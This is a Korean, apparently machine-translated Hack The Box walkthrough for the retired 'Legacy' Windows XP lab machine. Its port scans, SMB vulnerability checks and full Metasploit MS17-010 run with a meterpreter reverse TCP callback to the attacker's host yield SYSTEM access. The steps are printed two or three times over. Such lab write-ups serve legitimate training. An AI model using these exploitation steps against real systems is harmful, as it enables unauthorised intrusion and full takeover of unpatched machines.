【HackTheBox】레거시 - Walkthrough -
16163 단어 보안KaliLinuxCTFHackTheBox
Hack The Box에 대한 자세한 내용은 "Hack The Box를 즐길 수 있는 Kali Linux 튜닝"을 함께 확인하십시오.
기계 상세
이그제큐티브 요약
도구
도구
상세 절차
네트워크 서비스 스캔
nmap
IP 주소 10.10.10.4
를 legacy.htb
로 /etc/hosts
에 추가합니다. 그런 다음 nmap
를 사용하여 포트 스캔을 수행합니다. 각 옵션의 목표는 다음과 같습니다.
-Pn: 스캔 전에 수행되는 ping에서 소통 확인을 하지 않고 스캔합니다.
-T4: 타이밍 템플릿을 설정합니다. 이번에는 "aggressive (4)"를 사용하고 있습니다. TCP 포트에 대한 스캔 처리의 동적 지연 시간이 10ms를 넘지 않도록 되어 있습니다.
-A: OS 검색 및 버전 검색을 활성화합니다.
-v: 중복 모드, 상세를 출력합니다.
Nmap Network Scanning, h tps : // 응마 p. rg/만/자/만-b 리에후 p치온 s. HTML
kali@kali:~$ nmap -Pn -T4 -A -v legacy.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:26 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating Connect Scan at 03:26
Scanning legacy.htb (10.10.10.4) [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed Connect Scan at 03:27, 27.82s elapsed (1000 total ports)
Initiating Service scan at 03:27
Scanning 2 services on legacy.htb (10.10.10.4)
Completed Service scan at 03:27, 6.84s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.4.
Initiating NSE at 03:27
Completed NSE at 03:28, 51.87s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h29m24s, deviation: 2h07m15s, median: 4d22h59m25s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:7e:96 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-02T12:26:41+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds
이제 목표에서 실행중인 서비스가 밝혀졌습니다. 특히 신경이 쓰이는 것은 다음과 같습니다.
포트 번호
서비스
버전
139/tcp
netbios-ssn
Microsoft Windows netbios-ssn
445/tcp
microsoft-ds
Windows XP microsoft-ds
SMB 서비스 스캔
SMB
서비스의 상세를 열거해 봅시다. rpcclient
명령을 실행합니다. 불행히도 익명 연결을 지원하지 않는 것 같습니다.
kali@kali:~$ rpcclient -U "" legacy.htb
Enter WORKGROUP\'s password:
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
nmap
에서는, Nmap Script Engine
에 의해 Lua
스크립트 언어에 의해, 네트워크 처리를 자동화하는 스크립트를 쓸 수가 있습니다.
이번에는 -script
옵션을 지정하고 SMB 취약점에 대한 스크립트를 한꺼번에 legacy.htb
로 스캔합니다.
kali@kali:~$ nmap -Pn -v -script smb-vuln* -p 139,445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:48 EDT
NSE: Loaded 11 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Initiating Connect Scan at 03:48
Scanning legacy.htb (10.10.10.4) [2 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed Connect Scan at 03:48, 0.28s elapsed (2 total ports)
NSE: Script scanning 10.10.10.4.
Initiating NSE at 03:48
Completed NSE at 03:48, 6.76s elapsed
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.28s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
NSE: Script Post-scanning.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
그 결과 MS17-010(CVE-2017-0143)의 취약점이 있음을 확인할 수 있었습니다.
Metasploit 사용
공격 모듈 검색
Metasploit Framework
에서 MS17-010(CVE-2017-0143)
에 해당하는 코드를 검색해 봅니다.
kali@kali:~$ msfconsole
msf5 > search cve-2017-0143
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
4 exploit/windows/smb/ms17_010_psexec
를 사용할 수 있을 것 같습니다.
공격 모듈 설정
use
명령으로 이전에 검색한 모듈의 사용을 선언합니다.
선언에 성공하면 프롬프트가 msf5 exploit(windows/smb/ms17_010_psexec) >
로 바뀝니다.
msf5 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) >
모듈에서 설정할 항목을 options
명령으로 확인하십시오.
이 중 [Required]가 [yes]로 되어 있는 항목은 설정 필수 항목입니다.
이 경우 [DBGTRACE], [LEAKATTEMPTS], [NAMED_PIPES], [RHOSTS], [RPORT], [SHARE]입니다.
그러나 [RHOST] 이외의 항목은 이미 값이 설정되어 있는지 확인할 수 있습니다. 따라서 이번에는 [RHOSTS]만을 설정하면 설정 완료입니다.
msf5 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) >
[RHOSTS]에 설정할 값은 The target host(s)
입니다.
즉, legacy.htb
의 IP 주소를 설정해야 합니다. 값을 설정하려면 set
명령을 사용합니다.
set 設定名 設定値
이 경우 다음 명령 구문으로 설정할 수 있습니다.
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) >
공격 모듈 실행
exploit
명령에서 익스플로잇 코드를 실행합니다.
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821167c0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... CWqoNatO.exe
[*] 10.10.10.4:445 - Created \CWqoNatO.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \CWqoNatO.exe...
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1032) at 2020-08-28 04:04:05 -0400
meterpreter
프롬프트가 표시됩니다.getuid
명령으로 권한을 확인하면 NT AUTHORITY\SYSTEM
권한을 얻는 데 성공했는지 확인할 수 있습니다.
이것으로, legacy.htb
머신의 장악에 성공이 됩니다.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
참고 정보
Walkthrough
nmap
IP 주소
10.10.10.4
를 legacy.htb
로 /etc/hosts
에 추가합니다. 그런 다음 nmap
를 사용하여 포트 스캔을 수행합니다. 각 옵션의 목표는 다음과 같습니다.-Pn: 스캔 전에 수행되는 ping에서 소통 확인을 하지 않고 스캔합니다.
-T4: 타이밍 템플릿을 설정합니다. 이번에는 "aggressive (4)"를 사용하고 있습니다. TCP 포트에 대한 스캔 처리의 동적 지연 시간이 10ms를 넘지 않도록 되어 있습니다.
-A: OS 검색 및 버전 검색을 활성화합니다.
-v: 중복 모드, 상세를 출력합니다.
Nmap Network Scanning, h tps : // 응마 p. rg/만/자/만-b 리에후 p치온 s. HTML
kali@kali:~$ nmap -Pn -T4 -A -v legacy.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:26 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating NSE at 03:26
Completed NSE at 03:26, 0.00s elapsed
Initiating Connect Scan at 03:26
Scanning legacy.htb (10.10.10.4) [1000 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed Connect Scan at 03:27, 27.82s elapsed (1000 total ports)
Initiating Service scan at 03:27
Scanning 2 services on legacy.htb (10.10.10.4)
Completed Service scan at 03:27, 6.84s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.10.4.
Initiating NSE at 03:27
Completed NSE at 03:28, 51.87s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h29m24s, deviation: 2h07m15s, median: 4d22h59m25s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:7e:96 (VMware)
| Names:
| LEGACY<00> Flags: <unique><active>
| HTB<00> Flags: <group><active>
| LEGACY<20> Flags: <unique><active>
| HTB<1e> Flags: <group><active>
| HTB<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-09-02T12:26:41+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
NSE: Script Post-scanning.
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Initiating NSE at 03:28
Completed NSE at 03:28, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.21 seconds
이제 목표에서 실행중인 서비스가 밝혀졌습니다. 특히 신경이 쓰이는 것은 다음과 같습니다.
포트 번호
서비스
버전
139/tcp
netbios-ssn
Microsoft Windows netbios-ssn
445/tcp
microsoft-ds
Windows XP microsoft-ds
SMB 서비스 스캔
SMB
서비스의 상세를 열거해 봅시다. rpcclient
명령을 실행합니다. 불행히도 익명 연결을 지원하지 않는 것 같습니다.kali@kali:~$ rpcclient -U "" legacy.htb
Enter WORKGROUP\'s password:
Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
nmap
에서는, Nmap Script Engine
에 의해 Lua
스크립트 언어에 의해, 네트워크 처리를 자동화하는 스크립트를 쓸 수가 있습니다.이번에는
-script
옵션을 지정하고 SMB 취약점에 대한 스크립트를 한꺼번에 legacy.htb
로 스캔합니다.kali@kali:~$ nmap -Pn -v -script smb-vuln* -p 139,445 10.10.10.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 03:48 EDT
NSE: Loaded 11 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Initiating Connect Scan at 03:48
Scanning legacy.htb (10.10.10.4) [2 ports]
Discovered open port 139/tcp on 10.10.10.4
Discovered open port 445/tcp on 10.10.10.4
Completed Connect Scan at 03:48, 0.28s elapsed (2 total ports)
NSE: Script scanning 10.10.10.4.
Initiating NSE at 03:48
Completed NSE at 03:48, 6.76s elapsed
Nmap scan report for legacy.htb (10.10.10.4)
Host is up (0.28s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
NSE: Script Post-scanning.
Initiating NSE at 03:48
Completed NSE at 03:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds
그 결과 MS17-010(CVE-2017-0143)의 취약점이 있음을 확인할 수 있었습니다.
Metasploit 사용
공격 모듈 검색
Metasploit Framework
에서 MS17-010(CVE-2017-0143)
에 해당하는 코드를 검색해 봅니다.
kali@kali:~$ msfconsole
msf5 > search cve-2017-0143
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
4 exploit/windows/smb/ms17_010_psexec
를 사용할 수 있을 것 같습니다.
공격 모듈 설정
use
명령으로 이전에 검색한 모듈의 사용을 선언합니다.
선언에 성공하면 프롬프트가 msf5 exploit(windows/smb/ms17_010_psexec) >
로 바뀝니다.
msf5 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) >
모듈에서 설정할 항목을 options
명령으로 확인하십시오.
이 중 [Required]가 [yes]로 되어 있는 항목은 설정 필수 항목입니다.
이 경우 [DBGTRACE], [LEAKATTEMPTS], [NAMED_PIPES], [RHOSTS], [RPORT], [SHARE]입니다.
그러나 [RHOST] 이외의 항목은 이미 값이 설정되어 있는지 확인할 수 있습니다. 따라서 이번에는 [RHOSTS]만을 설정하면 설정 완료입니다.
msf5 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) >
[RHOSTS]에 설정할 값은 The target host(s)
입니다.
즉, legacy.htb
의 IP 주소를 설정해야 합니다. 값을 설정하려면 set
명령을 사용합니다.
set 設定名 設定値
이 경우 다음 명령 구문으로 설정할 수 있습니다.
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) >
공격 모듈 실행
exploit
명령에서 익스플로잇 코드를 실행합니다.
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821167c0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... CWqoNatO.exe
[*] 10.10.10.4:445 - Created \CWqoNatO.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \CWqoNatO.exe...
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1032) at 2020-08-28 04:04:05 -0400
meterpreter
프롬프트가 표시됩니다.getuid
명령으로 권한을 확인하면 NT AUTHORITY\SYSTEM
권한을 얻는 데 성공했는지 확인할 수 있습니다.
이것으로, legacy.htb
머신의 장악에 성공이 됩니다.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
참고 정보
Walkthrough
kali@kali:~$ msfconsole
msf5 > search cve-2017-0143
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection
2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) >
msf5 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The Target port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/ms17_010_psexec) >
set 設定名 設定値
msf5 exploit(windows/smb/ms17_010_psexec) > set rhost 10.10.10.4
rhost => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) >
msf5 exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 10.10.14.5:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 - [*] Preparing dynamite...
[*] 10.10.10.4:445 - [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 - [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 - [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x821167c0
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... CWqoNatO.exe
[*] 10.10.10.4:445 - Created \CWqoNatO.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (176195 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \CWqoNatO.exe...
[*] Meterpreter session 1 opened (10.10.14.5:4444 -> 10.10.10.4:1032) at 2020-08-28 04:04:05 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Walkthrough
@ 산포 _ 시호 "【Hack the Box write-up】Legacy "
@ 유키 츠카이 47 "Hack The Box[Legacy] -Writeup- "
기타
Reference
이 문제에 관하여(【HackTheBox】레거시 - Walkthrough -), 우리는 이곳에서 더 많은 자료를 발견하고 링크를 클릭하여 보았다 https://qiita.com/v_avenger/items/fc61a3ad6b5f9d3a6ca8텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
우수한 개발자 콘텐츠 발견에 전념 (Collection and Share based on the CC Protocol.)